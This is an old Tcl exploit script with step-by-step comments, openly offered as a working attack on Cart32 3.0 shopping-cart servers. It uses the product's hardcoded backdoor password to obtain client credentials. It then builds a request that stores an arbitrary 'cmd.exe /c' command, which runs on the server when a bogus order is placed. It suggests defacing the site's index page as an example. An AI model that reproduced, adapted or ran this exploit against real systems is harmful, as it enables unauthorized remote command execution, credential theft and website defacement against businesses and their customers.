#!/usr/bin/tcl
# [r00tabega.security.labs]
# www.r00tabega.com
# code by futant
# backdoor found by cerberus information security team
# http://www.cerberus-infosec.com {/advcart32.html}

# NOTE: This is very easy to exploit, but it takes a few minutes.
#
# OK, here's how you do this.
# Go to www.myserver.com/scripts/cart32.exe
# If it reports Cart32.exe 3.0, the target is probably affected.
#
# Now go to www.myserver.com/scripts/cart32.exe/cart32clientlist
# This is where the author put a backdoor: the page is guarded only by a
# fixed password. Type "wemilo" in the text field and hit the "Go" button.
# 
# Find the Client Code (username) for the site you are targeting; for
# example, www.myshophite.com's client code might be MSS or MYSHOP.
# Copy the client code and its client password into
# notepad/pico/whatever - the script below asks for both.
#
# Now run this script. It is a Tcl script, so it needs a Tcl interpreter.
# If you have a UNIX system, skip this part. If you are using Windows,
# get Tcl from http://www.scriptics.com and run it like this:
# Start -> Run -> tclsh83 wemilo.tcl
#
#
# This script will ask you for the hostname you are hacking,
# the client code, and the client password.
# 
# Then it will ask you for the command you want to run on the remote
# server.
#
# (Hint: if you need the web root path, IIS will sometimes disclose it in
#  the response to a request for a nonexistent handler file, e.g.
#  http://server.com/whatever.ida, whatever.idc, or /cgi-bin/whatever.pl)
#
# Then this script will write an HTML file called wemilo.html in the
# current directory on your machine. Note that the link it contains carries
# the client code and password in clear text, so delete the file when done.
# Open this file in Netscape or IE and click on the link. This should
# bring you to a Cart32 page with a lot of fields on it, including a text
# box with your command in it. Scroll down to the bottom of the page and
# click "Save Cart32+ Tab".
#
# Now the next order that comes through will run the command you selected.
# Go back to the main page of the site and add some items to a shopping cart.
# If they accept check/money order, fill in bogus details and confirm the
# order. Your command will then be run.
#
# This DOES work, unlike most supposed exploits.
#
#
# (IDK 2k)

package require http

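# --- interactive helper ----------------------------------------------------
# Collects the target host, a Cart32 client code and its password (both taken
# from the client-list page described in the header), and a command line, then
# builds the c32web.exe "Save Cart32+ Tab" URL that stores
# "cmd.exe /c <command>" as the Cart32+ "Run External Program" action for that
# client.  The URL is printed and also written as a link into ./wemilo.html.
#
# This script sends nothing over the network itself: it only assembles the URL.
# NOTE(review): the client code and password appear in clear text in the URL,
# on the terminal and in wemilo.html - delete the file when you are done.

# Print a prompt without a trailing newline and return the line typed in reply.
proc prompt {label} {
    puts -nonewline $label
    flush stdout
    return [gets stdin]
}

# Build the full c32web.exe request URL for one client/command pair.
# Every field is URL-encoded by ::http::formatQuery; hostname is used as
# typed, so it must not carry a scheme ("http://") prefix.
proc build_exploit_url {hostname clientcode clientpassword command} {
    set query [::http::formatQuery \
        TabName        "Cart32+" \
        Action         "Save Cart32+ Tab" \
        SaveTab        "Cart32+" \
        Client         $clientcode \
        ClientPassword $clientpassword \
        Admin          "" \
        AdminPassword  "" \
        TabToSave      "Cart32+" \
        PlusTabToSave  "Run External Program" \
        UseCMDLine     "Yes" \
        CMDLine        "cmd.exe /c $command"]
    return "http://$hostname/scripts/c32web.exe?$query"
}

puts "Cart32 exploit helper by futant"
puts "\nEnter the the hostname you wish to hack\nDo NOT include http://"
set hostname [prompt "Host: "]

puts "\nOk now, type in the Client code that you wish to use.\nYou can get a client code by going to:\nhttp://$hostname/scripts/cart32.exe/Cart32ClientList\nand typing wemilo for the password."
set clientcode [prompt "Client Code: "]

puts "\nEnter the clients password: (Also obtained from the URL above)"
set clientpassword [prompt "Client Password: "]

puts "\nNow type the command you want to run on the remote server: "
puts "(example: echo h4x0r3d by futant! > c:\\InetPub\\wwwroot\\index.html )"
# The "cmd /c " text is only a prompt; the real "cmd.exe /c " prefix is added
# when the query string is built.
set command [prompt "cmd /c "]

# Build the request once and always show it, so the user has a copy even when
# the HTML file cannot be written.
set url [build_exploit_url $hostname $clientcode $clientpassword $command]
puts "\nYour custom exploit string is:"
puts $url

# On open failure the original script kept going and then crashed on the first
# puts to the bogus channel; stop cleanly instead - the URL above is enough.
if {[catch {open wemilo.html w} fid]} {
    puts "ERROR: Couldnt open file for writing, copy and paste this URL.\n"
    exit 1
}
puts $fid {<HTML>}
puts $fid "<A HREF=\"$url\">Click here to hack $hostname</A>"
puts $fid {</HTML>}
close $fid
puts "\nWrote to wemilo.html :]\nExiting..."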

# k-rad.